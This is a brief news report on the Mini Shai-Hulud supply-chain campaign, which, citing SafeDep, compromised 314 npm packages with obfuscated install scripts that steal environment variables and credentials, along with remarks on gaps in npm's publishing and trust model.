Mini Shai-Hulud malware hits 314 npm packages

The Mini Shai-Hulud malware has compromised 314 npm packages by injecting obfuscated code that exfiltrates environment variables and system information [SafeDep]. The malicious payloads are hidden in package scripts, triggering on install or execution, and contact command-and-control servers to send stolen data [SafeDep].

SafeDep traced the attack to recently published or updated packages with names resembling legitimate tools—such as @utils/core-helper and react-render-hooks—that gained quick adoption due to misleading documentation and high search rankings. Some packages had thousands of weekly downloads before being flagged.

The malware avoids detection by using domain generation algorithms (DGAs) for C2 infrastructure and only activating on non-sandboxed systems. It targets credentials, API keys, and session tokens stored in environment variables, making it particularly dangerous for CI/CD pipelines and production deployments.

SafeDep identified overlapping code signatures and infrastructure with earlier Mini Shai-Hulud campaigns dating back to 2022, suggesting a persistent actor reusing and refining the same tooling. The group has previously targeted PyPI and RubyGems, indicating a cross-platform supply chain strategy.

NPM has since removed the compromised packages, but the speed and scale of the campaign expose critical gaps in automated scanning and reputation-based trust models. Developers often install packages based on name familiarity or download volume—both of which attackers now exploit systematically.

The incident underscores how easily malicious actors can weaponize npm’s open publishing model. Unlike ecosystems with stricter curation or mandatory code review, npm allows immediate public access upon registration, creating a persistent attack surface.